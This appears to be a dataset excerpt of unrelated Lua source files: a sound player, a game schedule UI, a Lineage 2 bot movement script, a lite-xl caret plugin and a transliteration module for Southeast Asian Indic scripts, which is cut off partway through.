content
stringlengths 5
1.05M
|
---|
-- サウンドプレイヤーモジュール
local SoundPlayer = {}
-- 初期化
function SoundPlayer:initializeSoundPlayer(sounds)
-- プライベート
self._soundPlayer = {}
-- サウンドリスト
self._soundPlayer.sounds = sounds
end
-- サウンドの取得
function SoundPlayer:getSound(name)
return self._soundPlayer.sounds ~= nil and self._soundPlayer.sounds[name] or nil
end
-- サウンドの再生
function SoundPlayer:playSound(name, reset)
reset = reset == nil and true or reset
local sound = self:getSound(name)
if sound then
if sound then
sound:seek(0)
end
sound:play()
end
end
-- サウンドの停止
function SoundPlayer:stopSound(name)
local sound = self:getSound(name)
if sound then
sound:stop()
end
end
return SoundPlayer
|
ENT.Type = "anim"
ENT.PrintName = "Autodrive coil"
ENT.Category = "Metrostroi (utility)"
ENT.Spawnable = false
ENT.AdminSpawnable = false
ENT.RenderGroup = RENDERGROUP_BOTH
ENT.ValidModels = {
"models/metrostroi_train/81-717/rfid_reader.mdl",
"models/metrostroi_train/81-717/dkp_reader.mdl",
}
|
ScheduleLayer = Layer:extend()
function ScheduleLayer:new(calendar, currency)
ScheduleLayer.super.new(self)
self.layer_name = "ScheduleLayer"
self.calendar = calendar
self.currency = currency
self.current_week = 1
self.propagate_input_to_underlying = false
self.box_patch = patchy.load("gfx/textbox.9.png")
self.skill_events = {
constants.cook_event.id,
constants.gym_event.id,
constants.karaoke_event.id,
constants.library_event.id,
constants.study_event.id
}
self.work_events = {
constants.acct_event.id,
constants.black_event.id,
constants.delivery_event.id,
constants.lab_event.id,
constants.resto_event.id
}
self.rest_events = {
constants.nap_event.id,
constants.vacation_event.id
}
self.current_set = "skill_events"
self.events = self.skill_events
self.icons = {}
self.icons[constants.black_event.id] = love.graphics.newImage(constants.black_event.icon)
self.icons[constants.delivery_event.id] = love.graphics.newImage(constants.delivery_event.icon)
self.icons[constants.lab_event.id] = love.graphics.newImage(constants.lab_event.icon)
self.icons[constants.gym_event.id] = love.graphics.newImage(constants.gym_event.icon)
self.icons[constants.karaoke_event.id] = love.graphics.newImage(constants.karaoke_event.icon)
self.icons[constants.library_event.id] = love.graphics.newImage(constants.library_event.icon)
self.icons[constants.study_event.id] = love.graphics.newImage(constants.study_event.icon)
self.icons[constants.cook_event.id] = love.graphics.newImage(constants.cook_event.icon)
self.icons[constants.nap_event.id] = love.graphics.newImage(constants.nap_event.icon)
self.icons[constants.vacation_event.id] = love.graphics.newImage(constants.vacation_event.icon)
self.icons[constants.acct_event.id] = love.graphics.newImage(constants.acct_event.icon)
self.icons[constants.resto_event.id] = love.graphics.newImage(constants.resto_event.icon)
self.costs = {}
self.costs[constants.gym_event.id] = lume.format("-${1}/day", { 0 - constants.gym_event.cost_per_day })
self.costs[constants.karaoke_event.id] = lume.format("-${1}/day", { 0 - constants.karaoke_event.cost_per_day })
self.costs[constants.library_event.id] = lume.format("-${1}/day", { 0 - constants.library_event.cost_per_day })
self.costs[constants.study_event.id] = lume.format("-${1}/day", { 0 - constants.study_event.cost_per_day })
self.costs[constants.vacation_event.id] = lume.format("-${1}/day", { 0 - constants.vacation_event.cost_per_day })
self.costs[constants.black_event.id] = lume.format("+${1}~${2}/day", { constants.black_event.income_per_day_regular, constants.black_event.income_per_day_lucky })
self.costs[constants.delivery_event.id] = lume.format("+${1}~${2}/day", { constants.delivery_event.income_per_day_regular, constants.delivery_event.income_per_day_lucky })
self.costs[constants.lab_event.id] = lume.format("+${1}~${2}/day", { constants.lab_event.income_per_day_regular, constants.lab_event.income_per_day_lucky })
self.costs[constants.acct_event.id] = lume.format("+${1}~${2}/day", { constants.acct_event.income_per_day_regular, constants.acct_event.income_per_day_lucky })
self.costs[constants.resto_event.id] = lume.format("+${1}/day", { constants.resto_event.income_per_day_regular, constants.resto_event.income_per_day_lucky })
self.close_icon = love.graphics.newImage("gfx/icon_x.png")
self.close_rect = { x = 1175, y = 615, w = 45, h = 45 }
self.cached_week_row_rects = {}
self.cached_weekday_col_rects = {}
self.cached_weekday_rects = {}
self.cached_event_rects = {}
self.cached_selector_rects = {}
end
function ScheduleLayer:draw(dt)
-- bg
local bgc = constants.dark_bg_color
love.graphics.setColor(bgc.r, bgc.g, bgc.b, 0.5)
love.graphics.rectangle("fill", 0, 0, 1280, 720)
-- box
local box_scale = 3
love.graphics.setColor(1, 1, 1, 1)
love.graphics.push()
love.graphics.scale(3, 3)
local x, y, w, h = self.box_patch:draw(30 / box_scale, 30 / box_scale, 1220 / box_scale, 660 / box_scale)
love.graphics.pop()
x = x * box_scale
y = y * box_scale
w = w * box_scale
h = h * box_scale
local cell_width = 45
local cell_height = 45
local cal_x = 60
local cal_y = 60
local cal_w = cell_width * 7
local cal_h = cell_height * 6
-- column A "calendar view" / 2/3
local txt = constants.system_txt_color
local em = constants.db16_col12
local deem = constants.deemphasis_color
love.graphics.setColor(txt.r, txt.g, txt.b, 1)
love.graphics.rectangle("line", cal_x, cal_y, cal_w, cal_h)
love.graphics.printf(lume.format("${1}", { self.currency }), cal_x, cal_y + cal_h + 15, cal_w, "center")
-- week rows
for w = 1, 6, 1
do
if w == self.current_week then
-- set highlight color
love.graphics.setColor(em.r, em.g, em.b, 1)
else
-- set no color
love.graphics.setColor(0, 0, 0, 0)
end
if self.cached_week_row_rects[w] == nil then
self.cached_week_row_rects[w] = {
x = cal_x,
y = cal_y + cell_height * (w - 1),
w = cal_w,
h = cell_height
}
end
local rect = self.cached_week_row_rects[w]
love.graphics.rectangle("fill", rect.x, rect.y, rect.w, rect.h)
love.graphics.setColor(txt.r, txt.g, txt.b, 1)
love.graphics.rectangle("line", rect.x, rect.y, rect.w, rect.h)
end
-- weekday columns
love.graphics.setColor(txt.r, txt.g, txt.b, 1)
for wd = 1, 7, 1
do
if self.cached_weekday_col_rects[wd] == nil then
self.cached_weekday_col_rects[wd] = {
x = cal_x + cell_width * (wd - 1),
y = cal_y,
w = cell_width,
h = cal_h,
}
end
local rect = self.cached_weekday_col_rects[wd]
love.graphics.rectangle("line", rect.x, rect.y, rect.w, rect.h)
end
-- dates and icons
lume.each(self.calendar.days, function(day)
if self.cached_weekday_rects[day.day] == nil then
self.cached_weekday_rects[day.day] = {
x = cal_x + cell_width * (day:day_of_week()),
y = cal_y + cell_height * (day.week_num - 1),
w = cell_width,
h = cell_height
}
end
local rect = self.cached_weekday_rects[day.day]
if day.daily_event ~= nil then
love.graphics.setColor(1, 1, 1, 0.5)
love.graphics.draw(self.icons[day.daily_event.event_name], rect.x, rect.y, 0, 3, 3)
end
love.graphics.setColor(txt.r, txt.g, txt.b, 1)
love.graphics.setFont(constants.smol_font)
love.graphics.printf(day.day, rect.x, rect.y, rect.w - 6, "right")
end)
love.graphics.setFont(constants.big_font)
-- column B "activity choices" / 1/3
local act_x = cal_x + cal_w + 30
local act_txt_x = act_x + 45 + 15
local selector_index = 1
local selectors = { "skill_events", "work_events", "rest_events" }
local selector_width = (1220 - act_x) / 3
lume.each(selectors, function(id)
if self.cached_selector_rects[id] == nil then
self.cached_selector_rects[id] = {
x = act_x + selector_width * (selector_index - 1),
y = cal_y,
w = selector_width,
h = constants.unit_menu_height_per_item
}
end
local rect = self.cached_selector_rects[id]
local name = ""
if id == "skill_events" then
name = "Skills"
elseif id == "work_events" then
name = "Work"
elseif id == "rest_events" then
name = "Rest"
end
local is_current_selection = id == self.current_set
if is_current_selection then
love.graphics.setColor(em.r, em.g, em.b, 1)
else
love.graphics.setColor(txt.r, txt.g, txt.b, 1)
end
love.graphics.printf(name, rect.x, rect.y, rect.w, "center")
selector_index = selector_index + 1
end)
local index = 1
local this_week = lume.filter(self.calendar.days, function(d) return d.week_num == self.current_week end)
lume.each(self.events, function(id)
if self.cached_event_rects[id] == nil then
self.cached_event_rects[id] = {
x = act_txt_x,
y = cal_y + constants.unit_menu_height_per_item * (index) + 15,
w = 1220 - act_x - 60,
h = constants.unit_menu_height_per_item
}
end
local rect = self.cached_event_rects[id]
-- icon
love.graphics.setColor(1, 1, 1, 1)
local icon_y = rect.y + (constants.unit_menu_height_per_item - 45) / 2
love.graphics.draw(self.icons[id], act_x, icon_y, 0, 3, 3)
-- text
local is_current_selection = #this_week > 0 and this_week[1].daily_event ~= nil and this_week[1].daily_event.event_name == id
if is_current_selection then
love.graphics.setColor(em.r, em.g, em.b, 1)
else
love.graphics.setColor(txt.r, txt.g, txt.b, 1)
end
love.graphics.printf(id, rect.x, rect.y, rect.w, "left")
local cost = self.costs[id]
if cost ~= nil then
love.graphics.setColor(deem.r, deem.g, deem.b, 1)
love.graphics.printf(cost, rect.x, rect.y, rect.w, "right")
end
index = index + 1
end)
love.graphics.setColor(1, 1, 1, 1)
love.graphics.draw(self.close_icon, self.close_rect.x, self.close_rect.y, 0, 3)
end
function ScheduleLayer:keypressed(key, scancode, isrepeat)
if isrepeat == true then
return
end
if key == layer_manager.controls["Back"] then
back_sound()
layer_manager:remove_first()
elseif key == layer_manager.controls["Up"] then
confirm_sound()
if self.current_week > 1 then
self.current_week = self.current_week - 1
end
elseif key == layer_manager.controls["Down"] then
confirm_sound()
if self.current_week < self.calendar:week_count() then
self.current_week = self.current_week + 1
end
elseif key == layer_manager.controls["Left"] then
confirm_sound()
self:previous_set()
elseif key == layer_manager.controls["Right"] then
confirm_sound()
self:next_set()
end
end
function ScheduleLayer:mousepressed(x, y, button, istouch, presses)
-- check for collision with a week row
for week, rect in ipairs(self.cached_week_row_rects)
do
local left_x = rect.x
local right_x = rect.x + rect.w
local top_y = rect.y
local bottom_y = rect.y + rect.h
if x >= left_x and x <= right_x and y >= top_y and y <= bottom_y then
confirm_sound()
self.current_week = week
return
end
end
-- check for collision with an event
for id, rect2 in pairs(self.cached_event_rects)
do
local left_x = rect2.x
local right_x = rect2.x + rect2.w
local top_y = rect2.y
local bottom_y = rect2.y + rect2.h
if x >= left_x and x <= right_x and y >= top_y and y <= bottom_y then
confirm_sound()
self.calendar:set_week_event(self.current_week, self:event_for_id(id))
return
end
end
-- check for collision with a selector
for id, rect3 in pairs(self.cached_selector_rects)
do
local left_x = rect3.x
local right_x = rect3.x + rect3.w
local top_y = rect3.y
local bottom_y = rect3.y + rect3.h
if x >= left_x and x <= right_x and y >= top_y and y <= bottom_y then
confirm_sound()
self:switch_visible_set(id)
return
end
end
local close_left_x = self.close_rect.x
local close_right_x = self.close_rect.x + self.close_rect.w
local close_top_y = self.close_rect.y
local close_bottom_y = self.close_rect.y + self.close_rect.h
if x >= close_left_x and x <= close_right_x and y >= close_top_y and y <= close_bottom_y then
back_sound()
layer_manager:remove_first()
return
end
end
function ScheduleLayer:previous_set()
if self.current_set == "skill_events" then
self:switch_visible_set("rest_events")
elseif self.current_set == "rest_events" then
self:switch_visible_set("work_events")
elseif self.current_set == "work_events" then
self:switch_visible_set("skill_events")
end
end
function ScheduleLayer:next_set()
if self.current_set == "skill_events" then
self:switch_visible_set("work_events")
elseif self.current_set == "rest_events" then
self:switch_visible_set("skill_events")
elseif self.current_set == "work_events" then
self:switch_visible_set("rest_events")
end
end
function ScheduleLayer:switch_visible_set(set)
self.current_set = set
self.events = self[set]
self.cached_event_rects = {}
end
function ScheduleLayer:event_for_id(id)
if id == constants.cook_event.id then
return CookEvent()
elseif id == constants.gym_event.id then
return GymEvent()
elseif id == constants.karaoke_event.id then
return KaraokeEvent()
elseif id == constants.library_event.id then
return LibraryEvent()
elseif id == constants.study_event.id then
return StudyEvent()
elseif id == constants.black_event.id then
return BlackEvent()
elseif id == constants.delivery_event.id then
return DeliveryEvent()
elseif id == constants.lab_event.id then
return LabEvent()
elseif id == constants.nap_event.id then
return NapEvent()
elseif id == constants.vacation_event.id then
return VacationEvent()
elseif id == constants.acct_event.id then
return AccountingEvent()
elseif id == constants.resto_event.id then
return RestaurantEvent()
end
end
|
SCONFIG = L2TConfig.GetConfig();
SCONFIG_FILE = GetDir() .. '\\scripts\\girgk.l2b';
L2TConfig.SaveConfig(SCONFIG_FILE);
moveDistance = 30;
MoveTo(82853, 149250, -3464, moveDistance);
MoveTo(83146, 148923, -3440, moveDistance);
MoveTo(83275, 148875, -3400, moveDistance);
MoveTo(83319, 148819, -3400, moveDistance);
MoveTo(83336, 148363, -3400, moveDistance);
MoveTo(83328, 148153, -3400, moveDistance);
TargetNpc("Кларисса", 30080);
MoveTo(83424, 148014, -3400, moveDistance);
Talk();
ClickAndWait("teleport_request", "Teleport");
ClickAndWait("teleport_3539076864_6_57_1209025476_1", "1010005 - 29000 1000308");
WaitForTeleport();
MoveTo(-12782, 122774, -3112, moveDistance);
TargetNpc("Продавец Лотерейных Билетов", 30990);
MoveTo(-12663, 122798, -3112, moveDistance);
MoveTo(-12609, 122812, -3111, moveDistance);
MoveTo(-12618, 122811, -3112, moveDistance);
L2TConfig.LoadConfig(SCONFIG_FILE);
|
return {'ttje','ttjes'}
|
-- mod-version:2 -- lite-xl 2.0
local core = require "core"
local config = require "core.config"
local style = require "core.style"
local DocView = require "core.docview"
config.plugins.smoothcaret = { rate = 0.65 }
local docview_update = DocView.update
function DocView:update()
docview_update(self)
local minline, maxline = self:get_visible_line_range()
-- We need to keep track of all the carets
if not self.carets then
self.carets = { }
end
-- and we need the list of visible ones that `DocView:draw_caret` will use in succession
self.visible_carets = { }
local idx, v_idx = 1, 1
for _, line, col in self.doc:get_selections() do
local x, y = self:get_line_screen_position(line)
-- Keep the position relative to the whole View
-- This way scrolling won't animate the caret
x = x + self:get_col_x_offset(line, col) + self.scroll.x
y = y + self.scroll.y
if not self.carets[idx] then
self.carets[idx] = { current = { x = x, y = y }, target = { x = x, y = y } }
end
local c = self.carets[idx]
c.target.x = x
c.target.y = y
-- Chech if the number of carets changed
if self.last_n_selections ~= #self.doc.selections then
-- Don't animate when there are new carets
c.current.x = x
c.current.y = y
else
self:move_towards(c.current, "x", c.target.x, config.plugins.smoothcaret.rate)
self:move_towards(c.current, "y", c.target.y, config.plugins.smoothcaret.rate)
end
-- Keep track of visible carets
if line >= minline and line <= maxline then
self.visible_carets[v_idx] = self.carets[idx]
v_idx = v_idx + 1
end
idx = idx + 1
end
self.last_n_selections = #self.doc.selections
-- Remove unused carets to avoid animating new ones when they are added
for i = idx, #self.carets do
self.carets[idx] = nil
end
if self.mouse_selecting ~= self.last_mouse_selecting then
self.last_mouse_selecting = self.mouse_selecting
-- Show the caret on click, so that it can be seen moving towards the new position
if self.mouse_selecting then
core.blink_timer = core.blink_timer + config.blink_period / 2
core.redraw = true
end
end
-- This is used by `DocView:draw_caret` to keep track of the current caret
self.caret_idx = 1
end
function DocView:draw_caret(x, y)
local c = self.visible_carets[self.caret_idx] or { current = { x = x, y = y } }
local lh = self:get_line_height()
-- We use the scroll position to move back to the position relative to the window
renderer.draw_rect(c.current.x - self.scroll.x, c.current.y - self.scroll.y, style.caret_width, lh, style.caret)
self.caret_idx = self.caret_idx + 1
end
|
local _M = {}
local boyaaPath = "packages.boyaa"
_M.mvc = {
BoyaaCtr = require(boyaaPath..".mvc.BoyaaCtr"),
BoyaaView = require(boyaaPath..".mvc.BoyaaView"),
BoyaaLayout = require(boyaaPath..".mvc.BoyaaLayout"),
BoyaaWidgetExtend = require(boyaaPath..".mvc.BoyaaWidgetExtend"),
}
_M.mvp = {
BoyaaLayoutWidget = require(boyaaPath..".mvp.BoyaaLayoutWidget"),
BoyaaPresenter = require(boyaaPath..".mvp.BoyaaPresenter"),
BoyaaViewWidget = require(boyaaPath..".mvp.BoyaaViewWidget"),
BoyaaWidgetExtend = require(boyaaPath..".mvp.BoyaaWidgetExtend"),
}
_M.data = {
DataBase = require(boyaaPath..".data.DataBase"),
}
_M.behavior = {
BehaviorBase = require(boyaaPath..".behavior.BehaviorBase"),
BehaviorFactory = require(boyaaPath..".behavior.BehaviorFactory"),
BehaviorExtend = require(boyaaPath..".behavior.BehaviorExtend"),
BehaviorMap = require(boyaaPath..".behavior.BehaviorMap"),
}
return _M
|
local export = {}
local gsub = mw.ustring.gsub
function export.trwo(text, lang, sc, options)
if (sc == 'Brah') then
text = require('Brah-translit').tr(text, lang, sc)
elseif (sc == 'Deva') then
text = require('sa-translit').tr(text, lang, sc)
elseif (sc == 'Sinh') then
text = require('si-translit').tr(text, lang, sc)
elseif sc == 'Beng' or sc == 'Mymr' or sc == 'Lana' or sc == 'Khmr'
or sc == 'Thai' or sc == 'Laoo'
then
local u = mw.ustring.char
local function dc(x) -- Use this to make marks legible. The name 'dc' means 'drop carrier'.
return gsub(x, "[𑀓कকකကกᨠកກ]", "") -- These are the letter ka in the 9 supported Indic scripts.
end
local consonants = { -- And parts 1 of NFC-multipart independent vowels!
-- Bengali
['ক']='k', ['খ']='kh', ['গ']='g', ['ঘ']='gh', ['ঙ']='ṅ',
['চ']='c', ['ছ']='ch', ['জ']='j', ['ঝ']='jh', ['ঞ']='ñ',
['ট']='ṭ', ['ঠ']='ṭh', ['ড']='ḍ', ['ঢ']='ḍh', ['ণ']='ṇ',
['ত']='t', ['থ']='th', ['দ']='d', ['ধ']='dh', ['ন']='n',
['প']='p', ['ফ']='ph', ['ব']='b', ['ভ']='bh', ['ম']='m',
['য']='y', ['র']='r', ['ল']='l', ['ল়']='ḷ', -- xx['व']='v',
['শ']='ś', ['ষ']='ṣ', ['স']='s', ['হ']='h',
['ৰ']='v', ['ৰ'..u(0x200d)]='v', ['ৱ'] = 'v',
-- Myanmar
['က']='k', ['ခ']='kh', ['ဂ']='g', ['ဃ']='gh', ['င']='ṅ',
['စ']='c', ['ဆ']='ch', ['ဇ']='j', ['ဈ']='jh', ['ဉ']='ñ',
['ဋ']='ṭ', ['ဌ']='ṭh', ['ဍ']='ḍ', ['ဎ']='ḍh', ['ဏ']='ṇ',
['တ']='t', ['ထ']='th', ['ဒ']='d', ['ဓ']='dh', ['န']='n',
['ပ']='p', ['ဖ']='ph', ['ဗ']='b', ['ဘ']='bh', ['မ']='m',
['ယ']='y', ['ရ']='r', ['လ']='l', ['ဝ']='v', ['ဠ']='ḷ',
['ၐ']='ś', ['ၑ']='ṣ', ['သ']='s', ['ဟ']='h',
['ည']='ññ', ['ဿ']='ss', ['အ'] = 'ʼ',
-- Subscript consonants: 103B..103E, 105E..1060
[dc('ကျ')]='y', [dc('ကြ')]='r', [dc('ကွ')]='v', [dc('ကှ')]='h',
[dc('ကၞ')]='n', [dc('ကၟ')]='m', [dc('ကၠ')]='l',
-- Mon Pali consonants
['ၚ']='ṅ', ['ၛ']='jh',
-- Shan (Pali) consonants - Excludes SHAN THA, MEDIAL WA, SIGN SHAW
['ၵ']='k', ['ၶ']='kh', ['ၷ']='g', ['ꧠ']='gh', -- ['']='ṅ',
['ၸ']='c', ['ꧡ']='ch', ['ၹ']='j', ['ꧢ']='jh', ['ၺ']='ñ',
['ꩦ']='ṭ', ['ꩧ']='ṭh', ['ꩨ']='ḍ', ['ꩩ']='ḍh', ['ꧣ']='ṇ',
-- ['']='t', ['']='th',
['ၻ']='d', ['ꩪ']='dh', ['ၼ']='n',
-- ['']='p',
['ၽ']='ph', ['ၿ']='b', ['ꧤ']='bh', -- ['']='m',
-- ['']='y', ['']='r', ['']='l', ['']='v',
['ꩮ']='ḷ',
-- ['']='ś', ['']='ṣ', ['']='s',
['ႁ']='h',
-- ['']='ññ', ['']='ss',
['ဢ'] = 'ʼ',
-- Other first parts of independent vowels.
['ဣ']='i', ['ဥ']='u',
-- Lanna
['ᨠ']='k', ['ᨡ']='kh', ['ᨣ']='g', ['ᨥ']='gh', ['ᨦ']='ṅ',
['ᨧ']='c', ['ᨨ']='ch', ['ᨩ']='j', ['ᨫ']='jh', ['ᨬ']='ñ',
['ᨭ']='ṭ', ['ᨮ']='ṭh', ['ᨯ']='ḍ', ['ᨰ']='ḍh', ['ᨱ']='ṇ',
['ᨲ']='t', ['ᨳ']='th', ['ᨴ']='d', ['ᨵ']='dh', ['ᨶ']='n',
['ᨷ']='p', ['ᨸ']='p', ['ᨹ']='ph', ['ᨻ']='b', ['ᨽ']='bh', ['ᨾ']='m',
['ᨿ']='y', ['ᩁ']='r', ['ᩃ']='l', ['ᩅ']='v', ['ᩊ']='ḷ',
['ᩆ']='ś', ['ᩇ']='ṣ', ['ᩈ']='s', ['ᩉ']='h',
['ᩔ'] = 'ss', ['ᩋ'] = 'ʼ', ['ᩐ'] = 'ū',
-- Subscript consonants: 1A55, 1A56, 1A5B to 1A5E
[dc('ᨠᩕ')]='r', [dc('ᨠᩖ')]='l', [dc('ᨠᩛ')]='ṭh', [dc('ᨠᩜ')]='m',
[dc('ᨠᩝ')]='p', [dc('ᨠᩞ')]='s',
-- Khmer
['ក']='k', ['ខ']='kh', ['គ']='g', ['ឃ']='gh', ['ង']='ṅ',
['ច']='c', ['ឆ']='ch', ['ជ']='j', ['ឈ']='jh', ['ញ']='ñ',
['ដ']='ṭ', ['ឋ']='ṭh', ['ឌ']='ḍ', ['ឍ']='ḍh', ['ណ']='ṇ',
['ត']='t', ['ថ']='th', ['ទ']='d', ['ធ']='dh', ['ន']='n',
['ប']='p', ['ផ']='ph', ['ព']='b', ['ភ']='bh', ['ម']='m',
['យ']='y', ['រ']='r', ['ល']='l', ['វ']='v', ['ឡ']='ḷ',
['ឝ']='ś', ['ឞ']='ṣ', ['ស']='s', ['ហ']='h', ['អ'] = 'ʼ',
-- Thai
['ก']='k', ['ข']='kh', ['ค']='g', ['ฆ']='gh', ['ง']='ṅ',
['จ']='c', ['ฉ']='ch', ['ช']='j', ['ฌ']='jh', ['ญ']='ñ',
['ฏ']='ṭ', ['ฐ']='ṭh', ['ฑ']='ḍ', ['ฒ']='ḍh', ['ณ']='ṇ',
['ต']='t', ['ถ']='th', ['ท']='d', ['ธ']='dh', ['น']='n',
['ป']='p', ['ผ']='ph', ['พ']='b', ['ภ']='bh', ['ม']='m',
['ย']='y', ['ร']='r', ['ล']='l', ['ว']='v', ['ฬ']='ḷ',
['ศ']='ś', ['ษ']='ṣ', ['ส']='s', ['ห']='h', ['อ'] = '', -- ['อ'] = 'ʼ',
-- Lao
['ກ']='k', ['ຂ']='kh', ['ຄ']='g', ['ຆ']='gh', ['ງ']='ṅ',
['ຈ']='c', ['ຉ']='ch', ['ຊ']='j', ['ຌ']='jh', ['ຎ']='ñ',
['ຏ']='ṭ', ['ຐ']='ṭh', ['ຑ']='ḍ', ['ຒ']='ḍh', ['ຓ']='ṇ',
['ຕ']='t', ['ຖ']='th', ['ທ']='d', ['ຘ']='dh', ['ນ']='n',
['ປ']='p', ['ຜ']='ph', ['ພ']='b', ['ຠ']='bh', ['ມ']='m',
['ຍ']='y', ['ຢ']='y', ['ຣ']='r', ['ລ']='l', ['ວ']='v', ['ຬ']='ḷ',
['ຨ']='ś', ['ຩ']='ṣ', ['ສ']='s', ['ຫ']='h', ['ອ'] = '', -- ['ອ'] = 'ʼ',
['ດ']='d',
}
local diacritics = {
-- Bengali - only NFC needed
[dc('কা')]='ā', [dc('কি')]='i', [dc('কী')]='ī', [dc('কু')]='u', [dc('কূ')]='ū', [dc('কৃ')]='ṛ', [dc('কৄ')]='ṝ',
[dc('কৢ')]='ḷ', [dc('কৣ')]='ḹ', [dc('কে')]='e', [dc('কৈ')]='ai', [dc('কো')]='o', [dc('কৌ')]='au', [dc('ক্')]='',
-- Myanmar
[dc('ကာ')]='ā', [dc('ကါ')]='ā', [dc('ကိ')]='i', [dc('ကီ')]='ī', [dc('ကု')]='u', [dc('ကူ')]='ū',
[dc('ကၖ')]='ṛ', [dc('ကၗ')]='ṝ', [dc('ကၘ')]='ḷ', [dc('ကၙ')]='ḹ',
[dc('ကေ')]='e', [dc('ကဲ')]='ai',
-- The following are multicharacter!
[dc('ကော')]='o', [dc('ကော်')]='au', [dc('က်က္')]='', [dc('ကေါ')]='o', [dc('ကေါ်')]='au',
[dc('က္')]='', [dc('က်')]='',
-- Mon - treatment of Sanskrit au is to be determined!
[dc('ကဳ')]='ī',
-- Shan
[dc('ကႃ')]='ā', [dc('ကေႃ')]='o',
-- Lanna
[dc('ᨠᩣ')]='ā', [dc('ᨠᩤ')]='ā', [dc('ᨠᩥ')]='i', [dc('ᨠᩦ')]='ī', [dc('ᨠᩩ')]='u', [dc('ᨠᩪ')]='ū',
['ᩂ']='ṛ', ['ᩄ']='ḷ', -- Syllabic consonants may be very wrong!
[dc('ᨠᩮ')]='e', [dc('ᨠᩱ')]='ai', [dc('ᨠᩰ')]='o',
-- The next two rows are are multicharacter!
[dc('ᨠᩮᩣ')]='o', [dc('ᨠᩮᩢᩣ')]='au', [dc('ᨠᩮᩫᩢᩣ')]='au', [dc('ᨠᩮᩫᩣ')] = 'au',
[dc('ᨠᩮᩤ')]='o', [dc('ᨠᩮᩢᩤ')]='au', [dc('ᨠᩮᩫᩢᩤ')]='au', [dc('ᨠᩮᩫᩤ')] = 'au',
[dc('ᨠ᩠')]='', [dc('ᨠ᩺')]='', [dc('ᨠ᩼')]='',
-- Khmer
[dc('កា')]='ā', [dc('កិ')]='i', [dc('កី')]='ī', [dc('កុ')]='u', [dc('កូ')]='ū',
[dc('ក្ឫ')]='ṛ', [dc('ក្ឬ')]='ṝ', [dc('ក្ឭ')]='ḷ', [dc('ក្ឮ')]='ḹ', -- Multipart
[dc('កេ')]='e', [dc('កៃ')]='ai', [dc('កោ')]='o', [dc('កៅ')]='au', [dc('ក្')]='', [dc('ក៑')]='',
-- Thai
[dc('กั')]='a', ['า']='ā', [dc('กิ')]='i', [dc('กี')]='ī', [dc('กุ')]='u', [dc('กู')]='ū',
['ฤ']='ṛ', ['ฤๅ']='ṝ', ['ฦ']='ḷ', ['ฦๅ']='ḹ', -- Multipart
['เ']='e', ['ไ']='ai', ['โ']='o', ['เา']='au', [dc('กฺ')]='', [dc('ก์')]='', ['ะ']='a',
[dc('กึ')]='iṃ', -- Induced by jackbooted I/O
-- Lao
[dc('ກັ')]='a', ['າ']='ā', [dc('ກິ')]='i', [dc('ກີ')]='ī', [dc('ກຸ')]='u', [dc('ກູ')]='ū',
-- ['ฤ']='ṛ', ['ฤๅ')]='ṝ', ['ฦ']='ḷ', ['ฦๅ']='ḹ', -- Multipart
['ເ']='e', ['ໄ']='ai', ['ໂ']='o', [dc('ເກົາ')]='au', [dc('ກ຺')]='', [dc('ກ໌')]='',
['ະ']='a',
[dc('ກຶ')]='iṃ', -- Induced by jackbooted I/O
-- Results of subscripts - for 2nd level special subscripts.
['ṭ']='ṭ', ['n']='n', ['p']='p', ['m']='m',
['y']='y', ['r']='r', ['l']='l', ['w']='w', ['s']='s', ['h']='h',
}
local tt = {
-- Bengali independent vowels
['অ']='a', ['আ']='ā', ['ই']='i', ['ঈ']='ī', ['উ']='u', ['ঊ']='ū', ['ঋ']='ṛ', ['ৠ']='ṝ',
['ঌ']='ḷ', ['ৡ']='ḹ', ['এ']='e', ['ঐ']='ai', ['ও']='o', ['ঔ']='au',
-- chandrabindu, anusvara, visarga & avagraha
[dc('কঁ')]='m̐', [dc('কং')]='ṃ', ['ঃ']='ḥ', ['ঽ']='’',
--numerals
['০']='0', ['১']='1', ['২']='2', ['৩']='3', ['৪']='4', ['৫']='5', ['৬']='6', ['৭']='7', ['৮']='8', ['৯']='9',
-- Myanmar independent vowels
['အ']='a', ['အာ']='ā', ['ဣ']='i', ['ဤ']='ī', ['ဥ']='u', ['ဦ']='ū', ['ၒ']='ṛ', ['ၓ']='ṝ',
['ၔ']='ḷ', ['ၕ']='ḹ', ['ဧ']='e', ['အဲ']='ai', ['ဩ']='o', ['ဪ']='au', -- 2 of these are multi-character keys!
-- Mon
['ဣဳ'] = 'ī', ['ဥု'] = 'ū', ['ဨ'] = 'e',
-- Shan
['ဢ'] = 'a', ['ဢႃ'] = 'ā', ['ဢိ'] = 'i', ['ဢီ'] = 'ī', ['ဢု'] = 'u', ['ဢူ'] = 'ū',
['ဢေ'] = 'e', ['ဢေႃ'] = 'o', ['ဢဲ'] = 'ai', ['ဢော်'] = 'au',
-- chandrabindu, anusvara, visarga & avagraha
-- [dc('က')]='m̐',
[dc('ကံ')]='ṃ', ['း']='ḥ',
-- ['']='’',
--numerals
['၀']='0', ['၁']='1', ['၂']='2', ['၃']='3', ['၄']='4', ['၅']='5', ['၆']='6', ['၇']='7', ['၈']='8', ['၉']='9',
-- Lanna independent vowels
['ᩋ']='a', ['ᩋᩣ']='ā', ['ᩍ']='i', ['ᩎ']='ī', ['ᩏ']='u', ['ᩐ']='ū', ['ᩂ']='ṛ', -- ['']='ṝ',
['ᩄ']='ḷ',
-- ['']='ḹ',
['ᩑ']='e', ['ᩒ']='o', ['ᩋᩰ'] = 'o', ['ᩋᩮᩣ']='o', ['ᩐᩣ'] = 'au', ['ᩋᩱ'] = 'ai',
-- ['']='ai', ['']='au',
-- chandrabindu, anusvara, visarga & avagraha
-- [dc('')]='m̐',
[dc('ᨠᩴ')]='ṃ', ['ᩡ']='ḥ', [dc('ᨠᩘ')]='ṅ',
-- ['']='’',
--numerals
['᪀']='0', ['᪁']='1', ['᪂']='2', ['᪃']='3', ['᪄']='4', ['᪅']='5', ['᪆']='6', ['᪇']='7', ['᪈']='8', ['᪉']='9',
['᪐']='0', ['᪑']='1', ['᪒']='2', ['᪓']='3', ['᪔']='4', ['᪕']='5', ['᪖']='6', ['᪗']='7', ['᪘']='8', ['᪙']='9',
-- Khmer independent vowels
['អ']='a', ['អា']='ā', ['ឥ']='i', ['ឦ']='ī', ['ឧ']='u', ['ឨ']='ū', ['ឫ']='ṛ', ['ឬ']='ṝ',
['ឭ']='ḷ', ['ឮ']='ḹ', ['ឯ']='e', ['ឰ']='ai', ['ឱ']='o', ['ឲ']='o', ['ឳ']='au',
-- chandrabindu, anusvara, visarga & avagraha
-- [dc('ក')]='m̐',
[dc('កំ')]='ṃ', ['ះ']='ḥ',
-- ['']='’',
--numerals
